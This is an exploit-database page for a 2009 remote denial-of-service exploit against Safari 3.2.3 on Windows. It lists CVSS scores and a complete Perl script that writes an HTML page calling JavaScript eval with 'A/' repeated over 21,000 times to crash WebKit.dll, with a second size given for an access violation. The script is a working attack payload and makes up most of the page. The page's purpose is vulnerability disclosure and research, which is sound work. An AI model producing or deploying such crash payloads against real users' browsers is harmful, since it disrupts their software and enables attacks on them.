Safari 3.2.3 (Win32) JavaScript (eval) Remote DoS Exploit

2009.09.23
Credit: Jeremy Brown
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-399


CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: None
Integrity impact: None
Availability impact: Partial

#!/usr/bin/perl # letsgosurfinnowonsafari.pl # AKA # Safari 3.2.3 (Win32) JavaScript 'eval' Remote Denial of Service Exploit # # Jeremy Brown [0xjbrown41@gmail.com//jbrownsec.blogspot.com//krakowlabs.com] 09.07.2009 # # ********************************************************************************************************* # Safari crashes when interpreting a webpage that calls the "eval" JavaScript function with "A/" repeating # 21526 times (43052 bytes). When triggering this vulnerability, Safari will throw a "Stack Overflow" # exception, and then an access violation when adjusting the trigger to "A/" repeating 21697 times # (43394 bytes). The problem originates in the module "WebKit.dll". Safari uses this module as part of the # WebKit layout engine (www.webkit.org). # This issue was reported to Apple several months ago and it looks like they fixed it in Safari 4 # (4.1.2 tested) after recent testing. It has also been lying around the Fun Archive @ krakowlabs.com for # quite a while too. Btw, STACK_OVERFLOW does NOT mean there is a buffer overflow on the stack. It pretty # much means that the stack for the process has been exhausted and its maximum size has been reached. # ********************************************************************************************************* # letsgosurfinnowonsafari.pl $fn = 'letsgosurfinnowwithsafari.html'; $size = 21526; # "Stack Overflow" WebKit.dll #$size = 21697; # "Access Violation" WebKit.dll $payload = '<html><script type="text/javascript">' . "\n"; $payload = $payload . 'eval("' . "A/" x $size . '");' . "\n"; $payload = $payload . '</script></html>'; open(FD, '>' . $fn); print FD $payload; close(FD);

References:

http://www.milw0rm.com/exploits/9606


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top